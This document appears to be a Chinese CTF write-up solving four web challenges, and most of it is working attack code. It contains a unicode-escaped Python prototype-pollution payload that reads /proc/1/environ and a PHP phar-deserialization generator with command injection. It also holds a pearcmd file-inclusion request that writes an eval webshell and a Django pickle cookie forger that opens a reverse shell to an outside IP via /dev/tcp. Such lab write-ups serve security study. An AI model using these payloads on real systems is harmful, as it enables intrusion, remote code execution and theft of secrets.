目录

EzFlask

MyPicDisk

ez_cms

ez_py

---

让俺看看401web题

EzFlask

进来直接给了源码

import uuid

from flask import Flask, request, session
from secret import black_list
import json

app = Flask(__name__)
app.secret_key = str(uuid.uuid4())

def check(data):
    for i in black_list:
        if i in data:
            return False
    return True

def merge(src, dst):
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)

class user():
    def __init__(self):
        self.username = ""
        self.password = ""
        pass
    def check(self, data):
        if self.username == data['username'] and self.password == data['password']:
            return True
        return False

Users = []

@app.route('/register',methods=['POST'])
def register():
    if request.data:
        try:
            if not check(request.data):
                return "Register Failed"
            data = json.loads(request.data)
            if "username" not in data or "password" not in data:
                return "Register Failed"
            User = user()
            merge(data, User)
            Users.append(User)
        except Exception:
            return "Register Failed"
        return "Register Success"
    else:
        return "Register Failed"

@app.route('/login',methods=['POST'])
def login():
    if request.data:
        try:
            data = json.loads(request.data)
            if "username" not in data or "password" not in data:
                return "Login Failed"
            for user in Users:
                if user.check(data):
                    session["username"] = data["username"]
                    return "Login Success"
        except Exception:
            return "Login Failed"
    return "Login Failed"

@app.route('/',methods=['GET'])
def index():
    return open(__file__, "r").read()

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5010)

/register一眼python原型链污染

参考文章：Python原型链污染变体(prototype-pollution-in-python) - 跳跳糖

flask中blask_list的绕过：以 Bypass 为中心谭谈 Flask-jinja2 SSTI 的利用 - 先知社区

waf过滤了__init__，用unicode编码绕过即可 

payload:

{
    "\u005f\u005f\u0069\u006e\u0069\u0074\u005f\u005f" : {
        "__globals__" : {
            "__file__" : "/proc/1/environ"
            }
        }
    }
}

成功污染__file__

然后再访问初始界面，读到环境变量的flag

MyPicDisk

万能密码登录成功

再修改万能密码

显示登录成功

 随即又跳转回

 抓包看下

访问/y0u_cant_find_1t.zip拿到源码

拖进Seay里扫一下

在FILE类的__destruct中存在一个命令执行的拼接

可以白名单后缀的上传文件

md5_file属于文件操作，可以触发phar反序列化 

生成恶意phar文件 

<?php
class FILE{
    public $filename=";cat /adjaskdhnask_flag_is_here_dakjdnmsakjnfksd >flag.txt";
    public $lasttime;
    public $size;
    public function remove(){
        unlink($this->filename);
    }
    public function show()
    {
        echo "Filename: ". $this->filename. "  Last Modified Time: ".$this->lasttime. "  Filesize: ".$this->size."<br>";
    }
}

#获取phar包
$phar = new Phar("401.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");

$o = new FILE();
$phar->setMetadata($o);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
?>

文件上传表单

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>File Upload Form</title>
</head>
<body>
    <h1>Upload a File</h1>
    <!-- 文件上传表单 -->
    <form action="http://7d3089a6-31f1-40e4-bddb-faf9758f4ef9.node5.buuoj.cn:81/index.php" method="post" enctype="multipart/form-data">
        <p>
            <label for="file">Choose file to upload:</label>
            <input type="file" id="file" name="file" required>
        </p>
        <p>
            <button type="submit">Upload File</button>
        </p>
    </form>
</body>
</html>

由于我们的登录账户不是admin，每执行一次登录操作，session就会被销毁一次，所以在每次操作之前，都要记得把登录的包重新发一遍，重置session，然后再表单上传文件 

?file=phar://401.png&todo=md5

 成功触发phar反序列化，将命令执行结果写入文件

再访问/flag.txt拿到flag

ez_cms

进来是熊海CMS

(李彦宏谈百度和Google的区别...)

看到版本是V1.0

搜到历史漏洞，index.php可以任意文件包含

代码审计：熊海cms 首页文件包含漏洞复现-CSDN博客

直接打pearcmd(靶机环境的pearcmd.php路径要一番好找...)

利用pearcmd.php本地文件包含（LFI）-CSDN博客

?+config-create+/&r=../../../../../../../../../../usr/share/php/pearcmd&/<?=eval($_POST['cmd']);?>+/tmp/shell.php

 

成功写马🐎

连接蚁剑，拿flag

 

后台也存在文件包含点

访问/admin路由，弱口令admin/123456登录

成功进入后台 

继续打pearcmd

?+config-create+/&r=../../../../../../../../../../usr/share/php/pearcmd&/<?=eval($_POST['cmd']);?>+/tmp/shell.php

访问/tmp/shell.php，发现成功写入

 

 下略

ez_py

考的Django Session pickle 反序列化

settings.py存在关键信息泄露

ROOT_URLCONF = 'openlug.urls'
# for database performan
SESSION_ENGINE = 'django.contrib.sessions.backends.signed_cookies'
# use PickleSerializer
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'
SECRET_KEY = 'p(^*@36nw13xtb23vu%x)2wp-vk)ggje^sobx+*w2zd^ae8qnn'

参考文章：

由Django-Session配置引发的反序列化安全问题-安全客 - 安全资讯平台

python安全：django的secret key泄漏导致的代码执行实践.md

SECRET_KEY = 'p(^*@36nw13xtb23vu%x)2wp-vk)ggje^sobx+*w2zd^ae8qnn'
salt = "django.contrib.sessions.backends.signed_cookies"

import django.core.signing

import pickle

class PickleSerializer(object):
    """
    Simple wrapper around pickle to be used in signing.dumps and
    signing.loads.
    """
    def dumps(self, obj):
        return pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)

    def loads(self, data):
        return pickle.loads(data)


import subprocess

class Command(object):
    def __reduce__(self):
        return (subprocess.Popen, (('bash -c "bash -i >& /dev/tcp/124.222.136.33/1337 <&1"',),-1,None,None,None,None,None,False, True))

out_cookie= django.core.signing.dumps(
    Command(), key=SECRET_KEY, salt=salt, serializer=PickleSerializer)
print(out_cookie)

/auth路由下在sessionid处打入触发pickle反序列化

反弹shell拿到flag